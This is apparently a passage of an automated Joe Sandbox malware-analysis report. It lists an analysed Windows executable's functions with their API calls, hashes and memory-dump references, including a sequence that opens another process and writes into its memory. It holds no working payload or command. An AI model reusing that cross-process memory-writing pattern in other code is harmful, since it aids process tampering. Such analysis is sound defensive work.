                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID:
                                          • API String ID: 2931989736-0
                                          • Opcode ID: b4623d50170d6443f1496b93bd905946993729465adf75694c1847087f754737
                                          • Instruction ID: 3ef25c88f730beb18d56283f971af33fd940577200b4706d7f50340ab09bccd6
                                          • Opcode Fuzzy Hash: b4623d50170d6443f1496b93bd905946993729465adf75694c1847087f754737
                                          • Instruction Fuzzy Hash: 8101D272A042053BE21863109D82FEB735CDB20384B048227FE1696787EBE0DE1186F8
                                          Function 0011504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00115075
                                          • __beginthreadex.LIBCMT ref: 00115093
                                          • MessageBoxW.USER32(?,?,?,?), ref: 001150A8
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 001150BE
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001150C5
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                          • String ID:
                                          • API String ID: 3824534824-0
                                          • Opcode ID: 58959b6d996e0e515fa1446c7b3d8b1b6ca760bde1b7d69d0e8f52548c3d6806
                                          • Instruction ID: e6d7f2da6f1205b48bf3a547cab235376a28118aa74785269403fff14eef4e67
                                          • Opcode Fuzzy Hash: 58959b6d996e0e515fa1446c7b3d8b1b6ca760bde1b7d69d0e8f52548c3d6806
                                          • Instruction Fuzzy Hash: 0C11E976908758ABC7059FA89C04AEF7FADAB89320F140265F928D37A1D77189C087F0
                                          Function 00108E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00108E3C
                                          • GetLastError.KERNEL32(?,00108900,?,?,?), ref: 00108E46
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00108900,?,?,?), ref: 00108E55
                                          • HeapAlloc.KERNEL32(00000000,?,00108900,?,?,?), ref: 00108E5C
                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00108E73
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 842720411-0
                                          • Opcode ID: 27e8d62f83216a6f29cb80ba0f47c900a6e8c1b8b5c19fe2cd28ac66f8541367
                                          • Instruction ID: 0bf767375e280ce89c7eadd9e0aeaecccf3fdf292543e02df3213cb7f2f29d0f
                                          • Opcode Fuzzy Hash: 27e8d62f83216a6f29cb80ba0f47c900a6e8c1b8b5c19fe2cd28ac66f8541367
                                          • Instruction Fuzzy Hash: C70169B4210604BFDB214FA6DC88D6B7FADEF8A754B100529FA89C3260DB71DC50CA60
                                          Function 001157FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0011581B
                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00115829
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00115831
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0011583B
                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00115877
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                          • String ID:
                                          • API String ID: 2833360925-0
                                          • Opcode ID: d33570721c4043bbf8e7f8b19c9a782c5506167a77ced53952f6a473a4dd4b14
                                          • Instruction ID: 0240e9d96794b08c50c14296aba0eddcc530209ff901396e077a678003b16f22
                                          • Opcode Fuzzy Hash: d33570721c4043bbf8e7f8b19c9a782c5506167a77ced53952f6a473a4dd4b14
                                          • Instruction Fuzzy Hash: E4015735C01A19DBCF08AFE6D848AEDBBB9BB4D711F014166E601B2150CB3095A0CBA1
                                          Function 00107D28 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00107C62,80070057,?,?,?,00108073), ref: 00107D45
                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00107C62,80070057,?,?), ref: 00107D60
                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00107C62,80070057,?,?), ref: 00107D6E
                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00107C62,80070057,?), ref: 00107D7E
                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00107C62,80070057,?,?), ref: 00107D8A
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                          • String ID:
                                          • API String ID: 3897988419-0
                                          • Opcode ID: b0b99e3c8695204434b4a3c423c00c518fe0794db11b01754ae4f54b7ee7f497
                                          • Instruction ID: df81bca8eb6ae3167a77ad1eafc3d8406f7ba003f779e74dbad52038e730adb2
                                          • Opcode Fuzzy Hash: b0b99e3c8695204434b4a3c423c00c518fe0794db11b01754ae4f54b7ee7f497
                                          • Instruction Fuzzy Hash: 0701B176A01215BBCB114F95DD04BA97BADEF48351F104014FD48D22A0D7B1ED40CBA0
                                          Function 00108CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00108CDE
                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00108CE8
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00108CF7
                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00108CFE
                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00108D14
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          • Opcode ID: 3b9127f4e706d8df0fe2ee47da71b669cf70cbbff663f4661f77416f1bdd903b
                                          • Instruction ID: 7de145469a4bbfe2904d719a4e1de22e1742f9c7c65550c82d205590af93eb91
                                          • Opcode Fuzzy Hash: 3b9127f4e706d8df0fe2ee47da71b669cf70cbbff663f4661f77416f1bdd903b
                                          • Instruction Fuzzy Hash: 0FF03135204204AFDB110FE59C89E673B6DEF5A754B104515FA85861A0CBB1DC41DB60
                                          Function 00108D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00108D3F
                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00108D49
                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00108D58
                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00108D5F
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00108D75
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          • Opcode ID: 99a8904a73d719d18b589420898af5eb8541f10f7656ce54da764d83d201f780
                                          • Instruction ID: eea1cf2c29e9c04950dd10854c594a0ab33bce274dbb6f75ec561b529e38c0aa
                                          • Opcode Fuzzy Hash: 99a8904a73d719d18b589420898af5eb8541f10f7656ce54da764d83d201f780
                                          • Instruction Fuzzy Hash: FAF0A434214204AFD7220FA5DC88F673B6CEF4A754F140215FA88C31A0CBB0DD40DB60
                                          Function 0010CD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 0010CD90
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0010CDA7
                                          • MessageBeep.USER32(00000000), ref: 0010CDBF
                                          • KillTimer.USER32(?,0000040A), ref: 0010CDDB
                                          • EndDialog.USER32(?,00000001), ref: 0010CDF5
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                          • String ID:
                                          • API String ID: 3741023627-0
                                          • Opcode ID: 7d4984163788a981bba90c688fc45e1de4d62001ff62f0ea1d354d01553eb827
                                          • Instruction ID: e90cb710422aaf69e971ce4d98cb58fa3d033c4ca5d6363433ed41634c4c1017
                                          • Opcode Fuzzy Hash: 7d4984163788a981bba90c688fc45e1de4d62001ff62f0ea1d354d01553eb827
                                          • Instruction Fuzzy Hash: E201A274500708ABEB219B61DC8EBA67B78FB05701F010669A6C2A14E1DBF0A9948FC0
                                          Function 000B178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                          Download Yara Rule
                                          APIs
                                          • EndPath.GDI32(?), ref: 000B179B
                                          • StrokeAndFillPath.GDI32(?,?,000EBBC9,00000000,?), ref: 000B17B7
                                          • SelectObject.GDI32(?,00000000), ref: 000B17CA
                                          • DeleteObject.GDI32 ref: 000B17DD
                                          • StrokePath.GDI32(?), ref: 000B17F8
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                          • String ID:
                                          • API String ID: 2625713937-0
                                          • Opcode ID: 84160b963a24760f337115677af62e9294e93e9db31571619f52821fd5431bb9
                                          • Instruction ID: 59f6472ec2026bf9eb541ea850ad1a689a8f5c14ccd1a0ed418c5fe1f776fb56
                                          • Opcode Fuzzy Hash: 84160b963a24760f337115677af62e9294e93e9db31571619f52821fd5431bb9
                                          • Instruction Fuzzy Hash: A0F0193000C348EBDB665F26EC0CB993BB4AB06362F488214F92D869F1CB3089D6DF51
                                          Function 0011C9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 0011CA75
                                          • CoCreateInstance.OLE32(00143D3C,00000000,00000001,00143BAC,?), ref: 0011CA8D
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                          • CoUninitialize.OLE32 ref: 0011CCFA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                          • String ID: .lnk
                                          • API String ID: 2683427295-24824748
                                          • Opcode ID: 66e9c73506ad6dcdacc4f9b635efab102067f2fc9dee80e6db8665a55a58bd8f
                                          • Instruction ID: 0a5ecbd776e9cbb9dde7081ad09066f94b44055cdc2814a82cf7f257b669d1d5
                                          • Opcode Fuzzy Hash: 66e9c73506ad6dcdacc4f9b635efab102067f2fc9dee80e6db8665a55a58bd8f
                                          • Instruction Fuzzy Hash: CBA1F771508205AFD300EF64C891EEBB7E8EF95718F00492CB555972A3EB70EA49CB92
                                          Function 000BE3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000D0FE6: std::exception::exception.LIBCMT ref: 000D101C
                                            • Part of subcall function 000D0FE6: __CxxThrowException@8.LIBCMT ref: 000D1031
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                            • Part of subcall function 000C1680: _memmove.LIBCMT ref: 000C16DB
                                          • __swprintf.LIBCMT ref: 000BE598
                                          Strings
                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 000BE431
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                          • API String ID: 1943609520-557222456
                                          • Opcode ID: 73ea994744df00a8da35e6cc5303b565de8c4a71741b5713bb139e8f8945c11b
                                          • Instruction ID: e5da1d3fe6295c2104b5e24358a27880941bedcadd37e391779c76a927e5bb39
                                          • Opcode Fuzzy Hash: 73ea994744df00a8da35e6cc5303b565de8c4a71741b5713bb139e8f8945c11b
                                          • Instruction Fuzzy Hash: 56917B715087419FC724EF24D895DFEB7E8AF96300F40091DF596972A3EA20EE44CBA2
                                          Function 000D523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                          Download Yara Rule
                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 000D52CD
                                            • Part of subcall function 000E0320: __87except.LIBCMT ref: 000E035B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ErrorHandling__87except__start
                                          • String ID: pow
                                          • API String ID: 2905807303-2276729525
                                          • Opcode ID: 2e8a2936bf42fc243cde91a309e868f733ff310ecab9c73f155a9f5d2279ce1c
                                          • Instruction ID: 3004928064f4da41ec3aabe9e93f7f54caab7121ac56461bec048c1e2afadd61
                                          • Opcode Fuzzy Hash: 2e8a2936bf42fc243cde91a309e868f733ff310ecab9c73f155a9f5d2279ce1c
                                          • Instruction Fuzzy Hash: F151C0F1A097418BCB517729CE413BE37E49B01752F304D1AF8C5553EAEEB48DC89A62
                                          Function 000D0654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #$+
                                          • API String ID: 0-2552117581
                                          • Opcode ID: c1c6e2702242df368eb5c742f0913bfc26d2fffbce1f705520defcd0a9739ccb
                                          • Instruction ID: 886ccc3751e82f8097957eae5739d4e28d32c26102f45f78cc5206d783321f79
                                          • Opcode Fuzzy Hash: c1c6e2702242df368eb5c742f0913bfc26d2fffbce1f705520defcd0a9739ccb
                                          • Instruction Fuzzy Hash: 23511175904346CFDB25DF28C884AFE7BA4EF5A310F148056F8959B2D1C770ACA2CB60
                                          Function 000CCF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _memset$_memmove
                                          • String ID: ERCP
                                          • API String ID: 2532777613-1384759551
                                          • Opcode ID: 5317d235618fbde352462c94f0ce635d4057feb54f16d7930aff087c699705bf
                                          • Instruction ID: 2df0d83b3483163b2948fa1d811986224fe89b5d1aba69f1623f715178e10a84
                                          • Opcode Fuzzy Hash: 5317d235618fbde352462c94f0ce635d4057feb54f16d7930aff087c699705bf
                                          • Instruction Fuzzy Hash: F451A2719007099BDB24CF68C881BEEBBE4EF04314F24857FE48ADB291E775A585CB80
                                          Function 0010A3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00111CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00109E4E,?,?,00000034,00000800,?,00000034), ref: 00111CE5
                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0010A3F7
                                            • Part of subcall function 00111C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00109E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00111CB0
                                            • Part of subcall function 00111BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00111C08
                                            • Part of subcall function 00111BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00109E12,00000034,?,?,00001004,00000000,00000000), ref: 00111C18
                                            • Part of subcall function 00111BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00109E12,00000034,?,?,00001004,00000000,00000000), ref: 00111C2E
                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0010A464
                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0010A4B1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                          • String ID: @
                                          • API String ID: 4150878124-2766056989
                                          • Opcode ID: 17077f2a45a42c5392e563089a2ea9c1e2f25f144c66982bc849fa8a502758ae
                                          • Instruction ID: 89e3a1942e4e5a10b94a635ef5e7000dcf870a8b68b87f44b04a4fb745a43d00
                                          • Opcode Fuzzy Hash: 17077f2a45a42c5392e563089a2ea9c1e2f25f144c66982bc849fa8a502758ae
                                          • Instruction Fuzzy Hash: 10414B7690121CBFCB14DBA4CC85BDEB7B8EF49300F0440A5FA45A7180DBB06E85CBA1
                                          Function 001379FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00137A86
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00137A9A
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00137ABE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window
                                          • String ID: SysMonthCal32
